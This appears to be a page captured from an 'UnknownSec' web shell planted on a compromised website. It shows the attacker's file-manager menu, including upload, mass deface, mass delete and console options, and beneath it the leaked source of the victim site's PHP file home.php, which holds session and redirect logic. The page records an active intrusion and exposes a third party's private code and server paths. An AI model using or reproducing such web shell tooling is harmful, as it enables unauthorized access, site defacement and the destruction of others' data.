shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
dev.delv-in.com
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
home.php
<?php include('ini.php'); $Template = new Template; if (isset($_SESSION['LID']) && $_SESSION['LID'] <= 0 || !isset($_SESSION['LID'])){ $Template->redirect("index.php"); } if (!isset($_POST['submitBut'])){ $_POST['submitBut'] = ''; } if (isset($_POST['complete']) && $_POST['remindID'] > 0){ $User_Remind = new User_Remind; $User_Remind->update_complete($_POST['remindID'], $_POST['complete']); } include('includes/private_header.php'); echo $Template->get_alerts(); ?> <script language='javascript' > function check_width(){ var w = window.innerWidth; document.getElementById('w').value = w; } </script> <?php //=========== SET VIEWS ================== if ($_SESSION['LIS'] != 'staff' && $_SESSION['LIS'] != 'admin_assistant' && $_SESSION['LID'] > 0 ){ // show alerts and reminders //==== MOVES ALL amtProd to netProd, and amtColl to netColl =========== // $Revenue = new Revenue(); // $Revenue->v75update(); $Template->load('views/v_alerts.php'); } else { // staff who don't punch -- message to choose from menu options } // echo "<input type='text' name='w' id='w'><br>"; // echo __line__." home <pre>"; print_r($_SESSION); echo "</pre>"; include('includes/private_footer.php'); ?>
© 2026 UnknownSec